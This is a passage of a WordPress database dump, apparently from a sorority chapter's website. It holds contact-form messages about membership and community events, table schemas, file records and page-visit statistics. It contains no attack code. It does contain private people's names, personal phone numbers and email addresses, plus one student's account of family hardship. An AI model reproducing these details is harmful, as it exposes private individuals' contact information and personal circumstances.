Aditya McDuffy)\r\nInitiated Alpha Chapter Spring 1989'),(789,'Hello,\r\nI am inquiring about being included on the contact list for some of the organizations upcoming activities. I am not currently a member of Zeta Phi Beta but I am interested in possibly becoming a graduate member. I would like to, if possible, attend some of your functions and potentially volunteer some of my time to see if I would be a good fit.  \r\n\r\nI am currently a graduate student and a full time employee at the United States Copyright Office. I graduated with my M.B.A in 2012 with a 3.44 GPA from Walden University, and I am currently enrolled with the Fischler School of Education at NOVA South Eastern University for my Masters of Speech Pathology. \r\nI have a sincere passion mentoring, music, helping disadvantage/disabled children and motivational speaking.  I would love to share more about my interest and learn more about Zeta Phi Beta’s Lambda Gamma Zeta chapter.  \r\n\r\nMy contact information is below and I hope to hear from you soon. \r\nRespectfully, \r\nRose A. Matthews, MBA\r\n(301)825-4201\r\nrgmatthews@outlook.com'),(801,'Good Morning\r\n\r\nIt was a pleasure meeting your representatives during your prom dress giveaway at the Ridgeley Run Community Center last Spring .   Thank you for your consideration of loaning our model\'s dresses for our upcoming fashion.  \r\n\r\nMy church will be sponsoring a fashion production from 1:00PM -4:30PM on September 26, 2015 at the Holiday Inn in Jessup MD. \r\n\r\nWe would love an opportunity to borrow approximately 10 formal prom dresses for our girls of very modest means.  Provided below is a list of our model\'s dress sizes\r\n\r\nIn exchange, we will be happy to provide you with a free ad in our program book, website, and Facebook page.\r\n\r\nI will be happy to email you our latest newsletter and flyer for more information.  Please also feel free to visit us at www.lechicacademy.com.  Also, see our 2014 fashion show at YouTube/LeChic Academy..\r\n\r\nAny assistance you can provide will be great appreciated by our young ladies. \r\n\r\nPlease feel free to contact me to discuss the details.\r\n\r\nThank you,\r\n\r\nDr. Marlene Jackson'),(807,'Good Afternoon,\r\n\r\nI am interested in pursuing a membership in Zeta Phi Beta Sorority, Inc. I received my bachelor\'s degree in Business Information Systems from Stevenson University in December 2014 at the young age of 20 and I am currently working on my master\'s degree in Computer Forensics at Stevenson as well. Could you provide me with more information about pursuing a membership?\r\n\r\nThank you,\r\nMorgan Rone'),(813,'Greetings Ladies,\r\n \r\nI hope all is well. Would please be so kind and distribute this information  to all members of your  chapter.  We are now accepting applications for the 2015-16 Beautillion Class. If members know a high school male junior or senior in the Baltimore Area and surrounding counties have them apply online  using the information posted below.\r\n \r\nBrother Craig  Allen\r\n \r\n\r\nAPPLICATION DEADLINE IS FRIDAY OCTOBER 2nd, 2015!\r\n \r\n The following information to your fellow BGLO chapter members, social and civic organizations, guidance counselors or any high school male senior or junior who lives in Baltimore City or the surrounding counties.\r\n \r\n Applications for the Fourteenth Class of Delta Lambda\'s Beautillion Scholars Program are now available ONLINE at www.deltalambda.org. We are no longer providing hard-cop...y applications.\r\n\r\nOur program centers around young minority men who are 11th or 12 grade students and have demonstrated strong academic and leadership potential as well as those who need additional guidance and support during their journey to manhood. We believe that both have a capacity to be successful but only with the right mentoring.\r\n \r\n We are seeking your assistance and ask that you support our efforts by forwarding the application links to family members, friends, colleagues and church members. Our qualifications are: \r\n•1 A male in the 11th OR 12th grade for the 2015-16 academic year;\r\n•2 Interested in attending college;\r\n•3 Demonstrates leadership ability;\r\n•4 Involved in extra-curricular activities; and/or\r\n•5 Need just a little bit more guidance and support along the journey to manhood.\r\n Additionally we have planned a thorough interview process and orientation session designed to familiarize each applicant and his parents with our mission. \r\n \r\n APPLICATION DEADLINE: 5PM on Friday, October 2nd. \r\n \r\n Encourage your candidate to apply using our ONLINE APPLICATION, by copying and pasting the following link to their web browser: \r\n 11th Grade: http://wp.me/P2T9GC-dPR\r\n 12th Grade: http://wp.me/P2T9GC-46P\r\n We thank you in advance for the interest shown and the assistance given on our behalf.\r\n \r\n Sincerely,\r\n Bro. Antoine Banks\r\n Chairman\r\n Beautillion Scholars Program Committee\r\n Delta Lambda Chapter\r\n Alpha Phi Alpha Fraternity, Inc.\r\n eMail: beautillion@deltalambda.org\r\n Phone: (410) 921-6876'),(819,'Greetings Sorors -\r\nMy name is Natisha Willis from Nu Delta, University of Illinois, Fall 2003. \r\n\r\nI have not been active in quite some time, but I currently reside in Columbia, MD and would like information on the next service project if at all possible. \r\n\r\nThanks so much!\r\n\r\nIn your service,\r\nNatisha'),(837,'Greetings,\r\nI am looking to explore a different Graduate Chapter here in Maryland. I am currently a member of Tau Omega Zeta of Towson, MD. I am registered in Zeta under my maiden name Kalima Roberts. I would like to attend one of your Chapter Meetings and would like to attend any of your upcoming community service events. Please feel free to contact me via email at mzalawode@yahoo.com or via phone at 609-731-9429.\r\nThank you in advance for your consideration.\r\nSisterly, \r\nKalima Alawode'),(843,'Good evening Sorors,\r\nI\'m presently financial and active but am looking to transfer to a new chapter. I would like to attend a chapter meeting and some community service events that you are doing to meet and get a feel for the chapter.'),(849,'Hello,\r\n\r\nMy name is La Toya Smith-Butler and I am interested in membership in Zeta Phi Beta Sorority, more specifically Lambda Gamma Zeta chapter. I have been living in Maryland for two years now and have had an interest in joining Zeta Phi Beta for years. I wanted to reach out to this chapter as I have visited several chapters and I am trying to make an informed decision about joining and possibly being accepted in this organization.\r\n\r\nThank you,\r\n\r\nLa Toya Smith-Butler'),(855,'Good Afternoon, \r\n\r\nMy name is Samonne Whitehead I attend college, but I want to do more community service and network with other organization. I was wondering dose your chapter let students volunteer with you guys. If so can you send me information about volunteer dates ?'),(861,'Hello Sorors,\r\n\r\nI am interested in becoming an active member and finding a grad chapter that\'s a good fit for me.  Please provide me more information about the reclamation process and when I am able to attend a chapter meeting. \r\n\r\nSisterly,\r\nLisa J. Harris'),(878,'Good morning,\r\n\r\nMy name is Quinton Askew, Director of the Howard County MultiService Center.  I and sending this inquiry in reference to your Chapter partnering with our Center and specifically, our Getting Ahead (GA) graduate program.  The Getting Ahead program is twofold, it provides a framework to organizations to better serve those in need as well as providing workshops to low income residents in the community to assist in goal setting and obtaining needed resources.\r\n\r\nThe most important part of our Getting Ahead program is the graduates and next steps, we call Staying Ahead.  The GA graduates look forward to becoming a productive member of their community and connecting with others who can provide a positive impact on their lives.  We are seeking to have various professional groups partner with us to attend the graduates social (networking) events that are held quarterly to connect with graduates, provide positive support and possibly mentoring/coaching relationships.\r\n\r\nI would like to discuss more opportunities with someone to give a better overview of our programs and partnership opportunities.'),(890,'I am the Event Coordination Manager for HandbagsUlike. I have been unable to process payment for the Denim &amp; Pearls event. The contract has been sent, but I just need to make the payment.\r\n\r\nThanks so much,\r\nCeleste'),(896,'Hello Ladies of Zeta Phi Beta,\r\n\r\nAfter extensively looking over your website and seeing you women in the community I wanted to follow up and learn more about joining your sisterhood? As a volunteer for a cancer organization it is my mission to help other young women and men not to lose a parent to cancer like I recently did. \r\n\r\nAlso, mentoring young adults and help groom to show them they can be more than their environment is my passion! My mentee is currently in her junior year in college while I\'m currently in my last semester in graduate school. \r\n\r\nIt would be my honor to join your sisterhood and help spread your mission in the community and grow my network of strong sisters like! yourselves. \r\n\r\nI hope to hear from you soon\r\n\r\nBest,\r\nTommia Hayes'),(902,'Hello Ladies of Zeta Phi Beta,\r\n\r\nAfter extensively looking over your website and seeing you women in the community I wanted to follow up and learn more about joining your sisterhood? As a volunteer for a cancer organization it is my mission to help other young women and men not to lose a parent to cancer like I recently did. \r\n\r\nAlso, mentoring young adults and help groom to show them they can be more than their environment is my passion! My mentee is currently in her junior year in college while I\'m currently in my last semester in graduate school. \r\n\r\nIt would be my honor to join your sisterhood and help spread your mission in the community and grow my network of strong sisters like! yourselves. \r\n\r\nI hope to hear from you soon\r\n\r\nBest,\r\nTommia Hayes'),(914,'Hello,\r\n  My name is Amy Upchurch and I received your information from Dr. Burnett at Glenelg High School.  He informed me that your sorority may provide support with prom dresses.  Unfortunately, my family has endured some significant hardships this past year and it has created financial stress.  I wanted to find out if you are helping with prom dresses again this year and find out if there were things I could do to be considered.  It is my senior year.\r\nThanks\r\nAmy'),(920,'Greetings\r\n My name is Demetria Richardson. I am a graduate student at Bowie State University. The purpose of contact is to inform you of Bowie State’s Bike Tour and invite your organization to be apart of the event. Last year, the Bowie Metropolitan Alumni Chapter (BMAC) in partnership with Bowie State University (BSU) hosted its First Annual BSU Bike Tour. It was an official event for BSU’s 150th Sesquicentennial Celebration and a huge success with nearly 250 registrants and over 100 volunteers. The tour was the first ever for BSU and also for any Historically Black College and University (HBCU). Its primary purpose is to raise funds for BSU’s Scholarship Foundation and to give back to other designated community charities.\r\n We want to invite your organization to support our bike tour with an endorsement. We would greatly appreciate you announcing our event at your next chapter meeting, publishing this event on your activity calendar and your social media outlets.\r\n Our second annual event will occur on Saturday, September 10, 2016. It will start and end on BSU’s campus at 14000 Jericho Park Road, Bowie, Maryland. The planned distances are 20, 46, and 65 mile routes that will extend primarily through Prince George’s and Anne Arundel County. Each route is fully supported with rest stops that are equipped with healthy snacks and drinks, ride marshals, and support and gear (SAG). Our host cycling clubs are “Getting It In Cycling” and “PHASE Cycling.” Last year, we had cycling groups from all over the DMV area; along with members of the Divine Nine.\r\n We are looking forward to hearing from you and the opportunity to include your illustrious organization as a supporter of the BSU Bike Tour.\r\n Come join the fun!\r\n Demetria Richardson'),(926,'Good Evening,\r\n\r\n\r\n     I hope this email finds you in good spirits. My name is Erin Tolbert and I am interested in learning more about how I can be invited to become a member of Zeta Phi Beta Sorority, Incorporated.\r\n     Since I was a young child I have been very active in my local community.  Although my college did not offer any Greek organizations, I was still active in community service throughout my entire matriculation and even started my own on campus non-profit geared towards young female artists who serve the community through the creative arts.\r\n   Now that I have graduated, I am interested in becoming apart of a sorority that is dedicated to molding finer women who are dedicated to selflessly serving their communities. Zeta Phi Beta Sorority, Incorporated embodies the type of characteristics and service I possess and wish to be associated with. If you have any information about what I should do in order to seek membership, please let me know.\r\n\r\n God bless!\r\n\r\n\r\n\r\n\r\n\r\n Sincerely,\r\n\r\n\r\n Erin Tolbert'),(937,'Inline image 1\r\n \r\nMay 2016\r\n \r\nGreetings!\r\n \r\nYou are hereby invited to participate in the 2016 “Kick-off to Summer” Kickball Tournament and Wellness Day, sponsored by North Arundel County Alumnae Chapter (NACAC) of Delta Sigma Theta Sorority, Incorporated on Saturday, June 4, 2016 at Matthewstown Harmans Park, 7605 Ridge Chapel Road, Hanover, MD 21076.  Time: 10 a.m. to 3 p.m.\r\n \r\nDelta Sigma Theta is a public service sorority whose chapters serve communities under a Five-Point Programmatic Thrust which includes Educational Development, Economic Development, International Awareness and Involvement, Political Awareness and Involvement and Physical and Mental Health.  The NACAC Kickball Tournament and Wellness Day will emphasize the importance of physical activity as a boost to physical and mental well-being.\r\n \r\nThere are two ways that you, your colleagues, family, fiends and neighbors can participate in this fundraising event for the public service programs of NACAC. You can Create-A-Team or Donate On-Line.  Here’s how.\r\n \r\nTo Create-A-Team: \r\n1)      Organize a team of 8-10 players. Select a captain. Each team will play in round-robin style throughout the day from 10 a.m. to 3 p.m.\r\n2)      Complete the waiver form attached\r\n3)      Submit a $15 registration fee for each player on your team by May 27, 2016\r\n4)      Invite everyone you know to support your team\r\n5)      Concessions will be provided\r\n \r\nSubmit team payments online via Kickball Day, http://www.nacacdst.org/Kickball.html and select “Add to Cart.”\r\n \r\nTo Donate On-Line: If you prefer to make a monetary donation, visit the “Kickball Day” site at http://www.nacacdst.org/Kickball.html and select the “donate.”\r\n \r\nWe look forward to hearing from you and we hope to see you on the field! Please feel free to contact us at kickball@nacacdst.org for more information or if you have any questions.\r\n \r\n \r\nSincerely,\r\n \r\nJeanne D. Cooper\r\nChapter President\r\n \r\nMoniqua Roberts\r\nKickball Committee Co-Chair\r\n \r\nSharon Mooney\r\nKickball Committee Co-Chair\r\n \r\nMelaine Lee\r\nKickball Committee Co-Chair');
/*!40000 ALTER TABLE `lwz_rg_lead_detail_long` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_lead_meta`
--

DROP TABLE IF EXISTS `lwz_rg_lead_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_lead_meta` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` mediumint(8) unsigned NOT NULL DEFAULT '0',
  `lead_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`id`),
  KEY `lead_id` (`lead_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `form_id_meta_key` (`form_id`,`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_lead_meta`
--

LOCK TABLES `lwz_rg_lead_meta` WRITE;
/*!40000 ALTER TABLE `lwz_rg_lead_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_rg_lead_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_lead_notes`
--

DROP TABLE IF EXISTS `lwz_rg_lead_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_lead_notes` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `lead_id` int(10) unsigned NOT NULL,
  `user_name` varchar(250) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `date_created` datetime NOT NULL,
  `value` longtext,
  `note_type` varchar(50) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lead_id` (`lead_id`),
  KEY `lead_user_key` (`lead_id`,`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_lead_notes`
--

LOCK TABLES `lwz_rg_lead_notes` WRITE;
/*!40000 ALTER TABLE `lwz_rg_lead_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_rg_lead_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_sp_cu`
--

DROP TABLE IF EXISTS `lwz_sp_cu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_sp_cu` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `file` varchar(255) NOT NULL,
  `notes` text NOT NULL,
  `tags` text NOT NULL,
  `uid` int(11) NOT NULL,
  `cid` int(11) NOT NULL,
  `pid` int(11) NOT NULL,
  `parent` int(11) NOT NULL,
  `date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `status` int(11) NOT NULL,
  `form_id` int(11) NOT NULL,
  `entry_id` int(11) NOT NULL,
  `group_id` int(11) NOT NULL,
  `client_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_sp_cu`
--

LOCK TABLES `lwz_sp_cu` WRITE;
/*!40000 ALTER TABLE `lwz_sp_cu` DISABLE KEYS */;
INSERT INTO `lwz_sp_cu` VALUES (1,'Testing ','fa16-cmsy110-project-test-dates-calendar.pdf','','',1,0,0,0,'2016-12-04 21:29:43',0,0,0,0,0),(4,'September Agenda & Reports ','committee-reports-and-agendas.zip','','',5,0,0,0,'2016-12-06 02:00:47',0,0,0,0,0),(5,'Basileus Briefing ','12-dec-2016-basileus-briefing.docx','','',3,0,6,0,'2016-12-30 13:36:48',0,0,0,0,0),(6,'Meeting Agenda ','12-dec-2016-chapter-mtg-agenda.doc','','',3,0,6,0,'2016-12-30 13:37:23',0,0,0,0,0);
/*!40000 ALTER TABLE `lwz_sp_cu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_sp_cu_cats`
--

DROP TABLE IF EXISTS `lwz_sp_cu_cats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_sp_cu_cats` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_sp_cu_cats`
--

LOCK TABLES `lwz_sp_cu_cats` WRITE;
/*!40000 ALTER TABLE `lwz_sp_cu_cats` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_sp_cu_cats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_sp_cu_event_log`
--

DROP TABLE IF EXISTS `lwz_sp_cu_event_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_sp_cu_event_log` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `type` varchar(255) NOT NULL,
  `item_id` int(11) NOT NULL,
  `log` text NOT NULL,
  `uid` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_sp_cu_event_log`
--

LOCK TABLES `lwz_sp_cu_event_log` WRITE;
/*!40000 ALTER TABLE `lwz_sp_cu_event_log` DISABLE KEYS */;
INSERT INTO `lwz_sp_cu_event_log` VALUES (1,'2016-12-05 04:45:37','file',3,'File Downloaded',3),(2,'2016-12-05 19:01:55','file',4,'File Downloaded',5),(3,'2016-12-17 19:27:00','file',3,'File Downloaded',3),(4,'2016-12-30 06:38:26','file',5,'File Downloaded',3);
/*!40000 ALTER TABLE `lwz_sp_cu_event_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_sp_cu_form_entries`
--

DROP TABLE IF EXISTS `lwz_sp_cu_form_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_sp_cu_form_entries` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `uid` int(11) NOT NULL,
  `fid` int(11) NOT NULL,
  `value` varchar(255) NOT NULL,
  `file_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_sp_cu_form_entries`
--

LOCK TABLES `lwz_sp_cu_form_entries` WRITE;
/*!40000 ALTER TABLE `lwz_sp_cu_form_entries` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_sp_cu_form_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_sp_cu_forms`
--

DROP TABLE IF EXISTS `lwz_sp_cu_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_sp_cu_forms` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `template` text NOT NULL,
  `type` varchar(255) NOT NULL,
  `defaults` text NOT NULL,
  `sort` int(11) NOT NULL DEFAULT '0',
  `required` varchar(11) NOT NULL DEFAULT 'No',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_sp_cu_forms`
--

LOCK TABLES `lwz_sp_cu_forms` WRITE;
/*!40000 ALTER TABLE `lwz_sp_cu_forms` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_sp_cu_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_sp_cu_groups`
--

DROP TABLE IF EXISTS `lwz_sp_cu_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_sp_cu_groups` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `locked` int(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_sp_cu_groups`
--

LOCK TABLES `lwz_sp_cu_groups` WRITE;
/*!40000 ALTER TABLE `lwz_sp_cu_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_sp_cu_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_sp_cu_groups_assign`
--

DROP TABLE IF EXISTS `lwz_sp_cu_groups_assign`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_sp_cu_groups_assign` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `gid` int(11) NOT NULL,
  `uid` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_sp_cu_groups_assign`
--

LOCK TABLES `lwz_sp_cu_groups_assign` WRITE;
/*!40000 ALTER TABLE `lwz_sp_cu_groups_assign` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_sp_cu_groups_assign` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_sp_cu_project`
--

DROP TABLE IF EXISTS `lwz_sp_cu_project`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_sp_cu_project` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `uid` int(11) NOT NULL,
  `parent` int(11) NOT NULL DEFAULT '0',
  `cat_limit` int(11) NOT NULL DEFAULT '0',
  `parent_base` int(11) NOT NULL DEFAULT '0',
  `inherit_permissions` int(1) NOT NULL DEFAULT '0',
  `default_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_sp_cu_project`
--

LOCK TABLES `lwz_sp_cu_project` WRITE;
/*!40000 ALTER TABLE `lwz_sp_cu_project` DISABLE KEYS */;
INSERT INTO `lwz_sp_cu_project` VALUES (1,'Constiution & By-Laws',-1,0,0,0,0,0),(2,'Financial Forms',-1,0,0,0,0,0),(3,'Membership Forms',-1,0,0,0,0,0),(4,'Constitution and By-Laws',-1,0,0,0,0,0),(5,'Financial Forms',1,0,0,0,0,0),(6,'',3,0,0,0,0,0),(7,'',3,0,0,0,0,0),(16,'January 2017',3,10,0,0,0,0),(9,'',3,0,0,0,0,0),(10,'Monthly Chapter Meeting Reports',3,0,0,0,0,0),(11,'State Conference Reports',3,0,0,0,0,0),(12,'Constitution & By Laws',3,0,0,0,0,0),(13,'Regional Conference Reports',3,0,0,0,0,0),(14,'',3,0,0,0,0,0),(15,'Boule\\\' Reports',3,0,0,0,0,0),(17,'February 2017',3,10,0,0,0,0),(18,'March 2017',3,10,0,0,0,0);
/*!40000 ALTER TABLE `lwz_sp_cu_project` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_statistics_exclusions`
--

DROP TABLE IF EXISTS `lwz_statistics_exclusions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_statistics_exclusions` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `reason` varchar(255) DEFAULT NULL,
  `count` bigint(20) NOT NULL,
  PRIMARY KEY (`ID`),
  KEY `date` (`date`),
  KEY `reason` (`reason`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_statistics_exclusions`
--

LOCK TABLES `lwz_statistics_exclusions` WRITE;
/*!40000 ALTER TABLE `lwz_statistics_exclusions` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_statistics_exclusions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_statistics_historical`
--

DROP TABLE IF EXISTS `lwz_statistics_historical`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_statistics_historical` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `category` varchar(25) NOT NULL,
  `page_id` bigint(20) NOT NULL,
  `uri` varchar(255) NOT NULL,
  `value` bigint(20) NOT NULL,
  PRIMARY KEY (`ID`),
  UNIQUE KEY `page_id` (`page_id`),
  UNIQUE KEY `uri` (`uri`),
  KEY `category` (`category`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_statistics_historical`
--

LOCK TABLES `lwz_statistics_historical` WRITE;
/*!40000 ALTER TABLE `lwz_statistics_historical` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_statistics_historical` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_statistics_pages`
--

DROP TABLE IF EXISTS `lwz_statistics_pages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_statistics_pages` (
  `uri` varchar(255) NOT NULL,
  `date` date NOT NULL,
  `count` int(11) NOT NULL,
  `id` int(11) NOT NULL,
  UNIQUE KEY `date_2` (`date`,`uri`),
  KEY `url` (`uri`),
  KEY `date` (`date`),
  KEY `id` (`id`),
  KEY `uri` (`uri`,`count`,`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_statistics_pages`
--

LOCK TABLES `lwz_statistics_pages` WRITE;
/*!40000 ALTER TABLE `lwz_statistics_pages` DISABLE KEYS */;
INSERT INTO `lwz_statistics_pages` VALUES ('/','2017-02-02',2,6),('/scholarship/','2017-02-02',1,797),('/scholarship/application/','2017-02-02',1,804),('/event/4th-annual-denim-pearlz-party/','2017-02-02',2,842),('/','2017-02-03',14,6),('/event/4th-annual-denim-pearlz-party/','2017-02-03',4,842),('/members/','2017-02-03',5,553),('/scholarship/','2017-02-03',6,797),('/scholarship','2017-02-03',2,797),('/scholarship/application/','2017-02-03',4,804),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-03',1,956),('/login','2017-02-03',1,549),('/programs/','2017-02-03',1,247),('/event/a-pretty-polished-affair/','2017-02-03',1,485),('/history/','2017-02-03',1,190),('/login/','2017-02-03',1,549),('/','2017-02-04',20,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-04',4,956),('/scholarship/','2017-02-04',6,797),('/event/4th-annual-denim-pearlz-party/','2017-02-04',1,842),('/programs/','2017-02-04',3,247),('/appa/','2017-02-04',1,781),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-02-04',1,657),('/history/','2017-02-04',4,190),('/scholarship/application/','2017-02-04',10,804),('/members/','2017-02-04',1,553),('/','2017-02-05',12,6),('/event/4th-annual-denim-pearlz-party/','2017-02-05',4,842),('/event/a-pretty-polished-affair/','2017-02-05',1,485),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-05',2,956),('/members/','2017-02-05',1,553),('/history/','2017-02-05',2,190),('/programs/','2017-02-05',2,247),('/scholarship/','2017-02-05',3,797),('/scholarship/application/','2017-02-05',3,804),('/ts_teams/cherice-daniel-2/','2017-02-05',1,825),('/','2017-02-06',35,6),('/membership','2017-02-06',2,576),('/membership/','2017-02-06',2,576),('/scholarship/','2017-02-06',7,797),('/history/','2017-02-06',3,190),('/scholarship/application/','2017-02-06',3,804),('/?//connect.facebook.net/en_US/sdk.js','2017-02-06',2,6),('/?//connect_facebook_net/en_US/sdk_js','2017-02-06',2,6),('/login','2017-02-06',2,549),('/login/','2017-02-06',2,549),('/history','2017-02-06',2,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-06',1,956),('/event/4th-annual-denim-pearlz-party/','2017-02-06',4,842),('/event/a-pretty-polished-affair/','2017-02-06',3,485),('/members/','2017-02-06',2,553),('/programs/','2017-02-06',1,247),('/ts_teams/linda-brigmon/','2017-02-06',1,886),('/ts_teams/sandra-hudson/','2017-02-06',1,875),('/event/4th-annual-denim-pearlz-party/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,842),('/ts_teams/patreece-carter/','2017-02-06',1,885),('/ts_teams/crystal-whitaker/','2017-02-06',1,816),('/ts_teams/cassandra-dorsey/','2017-02-06',1,880),('/ts_teams/cherice-daniel-2/','2017-02-06',1,825),('/ts_teams/shanee-satchell/','2017-02-06',1,820),('/ts_teams/helen-newman/','2017-02-06',1,868),('/ts_teams/jeaneathia-yerby-crowder/','2017-02-06',1,828),('/ts_teams/kristin-clark/','2017-02-06',1,883),('/ts_teams/lillet-williams-2/','2017-02-06',1,824),('/ts_teams/rose-matthews/','2017-02-06',2,870),('/ts_teams/constance-kinder/','2017-02-06',1,822),('/ts_teams/tamika-r-daniels/','2017-02-06',1,814),('/ts_teams/kathy-ball/','2017-02-06',1,887),('/ts_teams/jontue-sumler/','2017-02-06',1,862),('/ts_teams/michele-franklin/','2017-02-06',1,877),('/ts_teams/angela-jefferson/','2017-02-06',1,874),('/ts_teams/w-ruth-conway/','2017-02-06',1,881),('/ts_teams/ebony-cogdell/','2017-02-06',1,882),('/ts_teams/rosee-ragin/','2017-02-06',1,866),('/ts_teams/tamara-curtis/','2017-02-06',1,821),('/ts_teams/kathy-j-barrett/','2017-02-06',1,819),('/ts_teams/